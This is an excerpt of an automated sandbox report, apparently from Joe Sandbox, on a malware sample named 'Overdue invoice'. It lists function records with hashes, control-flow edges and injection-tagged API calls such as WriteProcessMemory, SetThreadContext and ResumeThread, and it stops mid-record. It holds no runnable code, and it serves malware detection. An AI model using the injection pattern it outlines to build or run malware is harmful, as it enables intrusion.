                                                                          • Instruction ID: 07112ed278e5abb37e9c7c48244362c44e7e221ca06b6c0312ed672c68a9cbfb
                                                                          • Opcode Fuzzy Hash: 4354bf80d7be27e9dbeaa55786009424a5740975750b2af2e18672da1be5ad83
                                                                          • Instruction Fuzzy Hash: E541CFB1D003199FDF14CFAAD894ADEBBB5BF48314F24812AE819AB250D7749945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0273397A Relevance: 1.6, APIs: 1, Instructions: 86injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 578 273397a-2733981 579 2733983-273399d 578->579 580 27339bf-2733a19 578->580 583 27339a4-27339a7 579->583 584 273399f 579->584 585 2733a1b-2733a27 580->585 586 2733a29-2733a62 WriteProcessMemory 580->586 589 27339ae-27339b2 583->589 584->583 585->586 587 2733a64-2733a6a 586->587 588 2733a6b-2733a8c 586->588 587->588
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02733A55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 6604eac5d03912ff6c477219cfe2d78c5a63cf152319abe2a4099719cf32193e
                                                                          • Instruction ID: 38ed96325e50c610210e5fbacbc2898ccf6bc540371ce0aac081abf3ffe47d90
                                                                          • Opcode Fuzzy Hash: 6604eac5d03912ff6c477219cfe2d78c5a63cf152319abe2a4099719cf32193e
                                                                          • Instruction Fuzzy Hash: 073178B1905248DFCB11CFA9D945BDEBBF4BF48314F10846AE848E3381D3349944CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733B2A Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 591 2733b2a-2733b31 592 2733b33-2733b50 591->592 593 2733b6f-2733bec ResumeThread 591->593 596 2733b52 592->596 597 2733b57-2733b68 592->597 598 2733bf5-2733c09 593->598 599 2733bee-2733bf4 593->599 596->597 599->598
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: e54339349f18c55ad90605f4a38d7e98095bfcfb267bcee3342125513f33a66e
                                                                          • Instruction ID: b08b1ccd88ae1cc7c99f00f12d4b5f53ee7ab156de74e2d5a6fc5f44514cde2c
                                                                          • Opcode Fuzzy Hash: e54339349f18c55ad90605f4a38d7e98095bfcfb267bcee3342125513f33a66e
                                                                          • Instruction Fuzzy Hash: 382168B0C093888FCB12DFA9D9457DEBFF4AF49214F15809AD448E7292D7346945CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2BB58 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C2BBE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: f760aaa591717bd11fb5df695111bf1701b380fe18bda08263ed1fc9d6cb6f42
                                                                          • Instruction ID: 8c0f9eed0fb9f6a92ac9a3b72df9fc5775f868b2f575828cdadd4d34c45a43c5
                                                                          • Opcode Fuzzy Hash: f760aaa591717bd11fb5df695111bf1701b380fe18bda08263ed1fc9d6cb6f42
                                                                          • Instruction Fuzzy Hash: DD2124B59002589FDF10CFAAD984ADEFBF8EF48320F14842AE954A3310C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 027339C0 Relevance: 1.6, APIs: 1, Instructions: 66injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02733A55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 449f90051d6836c79c7a0ed539decfda272799ae0ba0aad3d5900ba3d76f1f15
                                                                          • Instruction ID: b9f1f0759c9985a997ea19993e411822df0b2d40b7121e90a4385374322c8abe
                                                                          • Opcode Fuzzy Hash: 449f90051d6836c79c7a0ed539decfda272799ae0ba0aad3d5900ba3d76f1f15
                                                                          • Instruction Fuzzy Hash: 7E2134B1900249DFCB10CFAAC985BDEBBF4FF48324F10842EE558A3240D738A544CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 027339C8 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02733A55
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 55ba3bfa56df7a040676449461437939731c6e80d5356afbb444faeb7e405f59
                                                                          • Instruction ID: c79bf07df69a4cb045f44ada30c063181858a42168ab51cf614d97931de4a7f8
                                                                          • Opcode Fuzzy Hash: 55ba3bfa56df7a040676449461437939731c6e80d5356afbb444faeb7e405f59
                                                                          • Instruction Fuzzy Hash: D521E6B1900259DFCB10CFAAD885BDEBBF4FF48314F10842AE558A3351D774A544CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2BB60 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C2BBE7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 1c533c320dee426d5a800246344864862053c069d20a1960e2033310ba988831
                                                                          • Instruction ID: a59454062b907a53f81449d973aaace06c072617f036eaaaef2fd7ed2bd7b78a
                                                                          • Opcode Fuzzy Hash: 1c533c320dee426d5a800246344864862053c069d20a1960e2033310ba988831
                                                                          • Instruction Fuzzy Hash: 8121C2B5D002599FDF10CFAAD984ADEBBF8EB48324F15841AF954A3350D374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733730 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027337B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 24ff9304e39caacb31d3d3567a124adcca9e068e26773cac94cc9f207d96e644
                                                                          • Instruction ID: f3abadad18a0f4081af5d8addfec3027463c38dc2a8ab2890f3ea0a9d0d2bf6c
                                                                          • Opcode Fuzzy Hash: 24ff9304e39caacb31d3d3567a124adcca9e068e26773cac94cc9f207d96e644
                                                                          • Instruction Fuzzy Hash: 4F2104B5901259DFCB10CFAAD984BDEFBF4BF48320F15852AE968A3251D334A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733738 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 027337B7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: 84e5a92fe8db7f65b6b89337d4cab90d250215a3fa0afcee099046885ee484d8
                                                                          • Instruction ID: 8595929aacbd6c5959fa628950f901b208faf63fe0acb8f869049fd90b1c89bf
                                                                          • Opcode Fuzzy Hash: 84e5a92fe8db7f65b6b89337d4cab90d250215a3fa0afcee099046885ee484d8
                                                                          • Instruction Fuzzy Hash: 7121D0B59002599FCB10CFAAD884ADEBBF4FB48320F11842AE958A3251D374A544CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733672 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 027336EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 54932f371192826ca3ac1620ef97f721fc302b8d0a7229ae7e2e60a7417274e5
                                                                          • Instruction ID: 1ca2010d05cf46a91436b31c6034374ae1c819e2868cf2411a1ce6033483f2b4
                                                                          • Opcode Fuzzy Hash: 54932f371192826ca3ac1620ef97f721fc302b8d0a7229ae7e2e60a7417274e5
                                                                          • Instruction Fuzzy Hash: BA214AB1D0065A8FCB10CFA9C5857DEFBF4BB08224F15816AE458B7341D778A945CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733678 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 027336EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThread
                                                                          • String ID:
                                                                          • API String ID: 1591575202-0
                                                                          • Opcode ID: 2f03a90b6e111ed1eb06686e7eacef65db631c8a42c2f09f9819b588e7776671
                                                                          • Instruction ID: 24eec0d4e832c9482f67db2b8c9ce623f9f15d41a066605743e95d42a7bb3450
                                                                          • Opcode Fuzzy Hash: 2f03a90b6e111ed1eb06686e7eacef65db631c8a42c2f09f9819b588e7776671
                                                                          • Instruction Fuzzy Hash: 922136B1D0065A9FCB10CFAAC8857DEFBF4BB48224F15816AE418A3340D778A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0726BD58 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0726BDCB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 294a4987bf2b74dc114b4efa15683aa18af17a83f0c5ae18a4c6ea8e65d29285
                                                                          • Instruction ID: 84c8bb6cde54c85805d567780d1e0655ef068f2a4abfc2ad18beb0e0fb54ef3d
                                                                          • Opcode Fuzzy Hash: 294a4987bf2b74dc114b4efa15683aa18af17a83f0c5ae18a4c6ea8e65d29285
                                                                          • Instruction Fuzzy Hash: 0521E4B59002599FCB10DFAAC884BDEFBF8FF48320F15842AE558A7250D778A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C29990 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 00C29A02
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: d43ea1372ddb8cd916f394151d02fc1358c5ce2840b01fca813d3c37898b31dc
                                                                          • Instruction ID: 6276872900dd20de15a54117531919cdfe9e3d1166a402602cb909dd9406f1ab
                                                                          • Opcode Fuzzy Hash: d43ea1372ddb8cd916f394151d02fc1358c5ce2840b01fca813d3c37898b31dc
                                                                          • Instruction Fuzzy Hash: 481106B19002598FCB10CFAAD484ADEFBF4EF98320F15841EE455A7600C774A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C29998 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 00C29A02
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 27754d1f475b14fb9a4a885e3e318c3dd380bca49ce0b6e89956db8344d7eb59
                                                                          • Instruction ID: cc7b5cb22c608993d2347f8873ee2500a80219434deea7a7104bf9af74d23fb2
                                                                          • Opcode Fuzzy Hash: 27754d1f475b14fb9a4a885e3e318c3dd380bca49ce0b6e89956db8344d7eb59
                                                                          • Instruction Fuzzy Hash: 9E11F3B6D003598FCB10DFAAD444ADEFBF4EB88324F15842EE459A7600C374A945CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733800 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02733873
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 6ef39e2666c0ba1275cb289f07fc3204251dcf0852511ffb831909c14a52aa0e
                                                                          • Instruction ID: 490ceb2e8d57db9d970a5ec7c13d1e3ebe0f78140b6227811ffedc5bd8099719
                                                                          • Opcode Fuzzy Hash: 6ef39e2666c0ba1275cb289f07fc3204251dcf0852511ffb831909c14a52aa0e
                                                                          • Instruction Fuzzy Hash: CC1113B5900249DFCB20DF9AC885BDEBFF4EB48324F148459E519A7310C335A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2911C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00C29543), ref: 00C29776
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 2e7a5f03339f84d0038e41bbfabdcb8681fb64cc5cccb3ee1c54102c07628456
                                                                          • Instruction ID: b1ee5a0d8bb245227e6366e5ef7e962a1ec363db52bd693a8959c5a8c5f395f6
                                                                          • Opcode Fuzzy Hash: 2e7a5f03339f84d0038e41bbfabdcb8681fb64cc5cccb3ee1c54102c07628456
                                                                          • Instruction Fuzzy Hash: 8011F0B5C006598FCB10DFAAD444BDEFBF8EB89724F15842AE829B7600D374A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733808 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02733873
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: f14e7c7cb665e14010c90505b9254f189da6d2dc39f41e16731ae3d65ba830c1
                                                                          • Instruction ID: 171f8663aa461a6d0385c11851a6c02cce1d4d598c4abe5f72077fd404d00476
                                                                          • Opcode Fuzzy Hash: f14e7c7cb665e14010c90505b9254f189da6d2dc39f41e16731ae3d65ba830c1
                                                                          • Instruction Fuzzy Hash: 5D11E3B5900249DFCB20DF9AC884BDEBBF4EB48324F158459E519A7250C775A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733E98 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 02733EFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 528e0889335dbc4a4df98faf18c1ab964b615e1aee36d9b991d71a4fdc12a32e
                                                                          • Instruction ID: a373bae84776daf2e56cb2ae8b63150aba5338c0f40e83315a2a8eb47a3a85ae
                                                                          • Opcode Fuzzy Hash: 528e0889335dbc4a4df98faf18c1ab964b615e1aee36d9b991d71a4fdc12a32e
                                                                          • Instruction Fuzzy Hash: DE1103B58002899FCB20DF9AD888BDEFFF4EB48324F15855AE455A7600C374A545CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733B7A Relevance: 1.5, APIs: 1, Instructions: 44threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 26bd81e0e6bb899b959e8ce3fc2a472938e2c43e7398bc97e8f6ce4764da5931
                                                                          • Instruction ID: 058d646517ce099efd13bf3c70dc5efa36e5a6c86049172c96da910fe5de8433
                                                                          • Opcode Fuzzy Hash: 26bd81e0e6bb899b959e8ce3fc2a472938e2c43e7398bc97e8f6ce4764da5931
                                                                          • Instruction Fuzzy Hash: 581103B59002498FCB20DF99D588BDEFBF4AB88324F21845AE459A7640C775A544CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733EA0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 02733EFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 385fa2c987390f024463859f090f525361fe41e4dcb9ef943a9780288eb3adbb
                                                                          • Instruction ID: 66aa6d5704ce35754871354781b0ddf689b078d488a44ef889bac933b212e794
                                                                          • Opcode Fuzzy Hash: 385fa2c987390f024463859f090f525361fe41e4dcb9ef943a9780288eb3adbb
                                                                          • Instruction Fuzzy Hash: 6E1112B58003499FCB20DF9AD884BDEFBF8EB48324F11845AE455A3700C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2FC99 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,?,?), ref: 00C2FCFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow
                                                                          • String ID:
                                                                          • API String ID: 1378638983-0
                                                                          • Opcode ID: 89de885c2d24edf441dbba8707e0f96ea6bc31e490002ec9802f96c2409937cb
                                                                          • Instruction ID: af3c27951ec4530c9126801b3ac2e9d7f457529a1cedd42744fe2124219e1315
                                                                          • Opcode Fuzzy Hash: 89de885c2d24edf441dbba8707e0f96ea6bc31e490002ec9802f96c2409937cb
                                                                          • Instruction Fuzzy Hash: E81133B5800249CFDB20CF99D584BDEFBF8EB48324F24842AE855A3740C374AA44CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00C2FCA0 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,?,?), ref: 00C2FCFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298223387.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_c20000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow
                                                                          • String ID:
                                                                          • API String ID: 1378638983-0
                                                                          • Opcode ID: f2f6e9fe4bf93acacb18db8faedd494975d024b907021e2ec734fc24d3714ef3
                                                                          • Instruction ID: ccfd56f6ed78367f2de242f2f9a888fe8d76d579f07e0ea700c270ca2db73f91
                                                                          • Opcode Fuzzy Hash: f2f6e9fe4bf93acacb18db8faedd494975d024b907021e2ec734fc24d3714ef3
                                                                          • Instruction Fuzzy Hash: AD1127B58002498FDB20DF99D484BDFFBF8EB48324F20851AE855A3740C374A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02733B80 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.298516020.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_2730000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 0e101b58391986b78ddaa562ac92176e668edbb88959d0ad630dcf15fa3a50f9
                                                                          • Instruction ID: f332c8f85fd31708edb8140dd7f44ffbbd50e1575794d18f94245ea2cfc85ac8
                                                                          • Opcode Fuzzy Hash: 0e101b58391986b78ddaa562ac92176e668edbb88959d0ad630dcf15fa3a50f9
                                                                          • Instruction Fuzzy Hash: 661123B18002498FCB20DF9AD484BDEFBF8EF48324F21845AE519A3340C774A944CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 00522809 Relevance: 1.5, Instructions: 1530COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.297583913.0000000000522000.00000002.00000001.01000000.00000003.sdmp, Offset: 00520000, based on PE: true
                                                                          • Associated: 00000000.00000002.297565297.0000000000520000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.297763203.00000000005BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.297784487.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_520000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e9fc60d6d2be36f1f4405b5a16900e169863bed8016f1815e1675ba50ed8ff0
                                                                          • Instruction ID: 86f77c1e4547146b1b5131f50a5354d1b5260a9b779d9f06673c0c89ac3232e6
                                                                          • Opcode Fuzzy Hash: 9e9fc60d6d2be36f1f4405b5a16900e169863bed8016f1815e1675ba50ed8ff0
                                                                          • Instruction Fuzzy Hash: CDC2526104E7D25FC7138BB42C742E2BF71AE5321471E85CBD4C18F0A3E6195A6AE772
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 072672D8 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: J03
                                                                          • API String ID: 0-918838917
                                                                          • Opcode ID: 32a2a2b5b88a20a8cce1f7e2ed5d4ddcb7aa25c7ea5470ad7cb5c0134831f3f5
                                                                          • Instruction ID: 6414eaac7fea3e0deeffe510334b354376b8730f0b23440c673d2ecc5ff194ee
                                                                          • Opcode Fuzzy Hash: 32a2a2b5b88a20a8cce1f7e2ed5d4ddcb7aa25c7ea5470ad7cb5c0134831f3f5
                                                                          • Instruction Fuzzy Hash: DB910374E2420ACFCB04CF99D5849AEFBF1FF89214F24956AD415AB324D370AA82CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 072672C8 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: J03
                                                                          • API String ID: 0-918838917
                                                                          • Opcode ID: 2f6f911da081cd251ce57f9abbfa11ebe45e725072656756c74580ca8e35372e
                                                                          • Instruction ID: 377b9c85e82bf249e1f6e3bb2ddb925e05da12ca37a6837c005daa37d2151b14
